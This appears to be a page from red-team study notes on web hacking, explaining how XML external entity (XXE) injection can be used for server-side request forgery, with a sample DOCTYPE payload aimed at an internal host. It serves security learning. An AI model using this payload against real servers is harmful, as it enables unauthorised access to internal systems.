RedTeam
3.Web-Hacking
4.Injection
XXE
Commands
2.xxe Ssrf Attacks

Exploiting XXE to Perform SSRF Attacks

  • Need to do the following:
    • Define an external XML entity using the URL you want to target
    • Use the defined entity within a data value
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM " http://internal.vulnerable-
website.com/"> ]>
1.xxe Retrieve Files3.xxe Blind